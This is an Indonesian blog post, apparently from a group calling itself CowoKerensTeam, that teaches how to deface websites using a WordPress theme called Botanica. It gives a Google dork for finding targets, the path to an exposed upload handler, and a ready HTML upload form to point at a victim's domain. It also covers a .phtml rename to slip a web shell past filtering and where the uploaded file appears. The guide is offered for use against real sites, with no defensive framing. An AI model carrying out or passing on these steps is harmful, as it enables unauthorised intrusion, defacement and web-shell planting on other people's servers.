Deface Menggunakan WordPress Themes Botanica

Bahan²
- Dork     >    inurl:/wp-content/themes/botanica-theme
- Exploit >   /wp-content/themes/botanica-theme/functions/upload-handler.php
- Csrf      >

     <form enctype="multipart/form-data"
    action="127.0.0.1/wp-content/themes/botanica-theme/functions/upload-handler.php"
    method="post">
    Please choose a file: <input name="orange_themes" type="file" /><br />
    <input type="submit" value="upload" />
    </form>

pertama lu dorking dulu di google

lalu buka website yang mau lu deface

Lalu masukan exploitnya

Kalo Vuln Tanda nya ada tulisan error

lalu buka csrf kalian

Ubah yang 127.0.0.1 menjadi website yg vuln tadi
lalu simpan dengan ekstensi .html (misalnya f.html)

kemudian buka csrf nya

Jika sudah pilih script deface kalian
lalu tekan Upload
*note > jika ingin mengupload shell di bypass ke shell.phtml

Kalo Vuln keluar nama file kalian

lalu tinggal manggil hasil deface nya

/wp-content/uploads/tahun/bulan/filelu.html

@Sumber : abnormal007

CowoKerensTeam

Header Ads

Deface Menggunakan WordPress Themes Botanica

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts

CowoKerensTeam

Header Ads

Deface Menggunakan WordPress Themes Botanica

Related Posts

Post a Comment

No comments

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts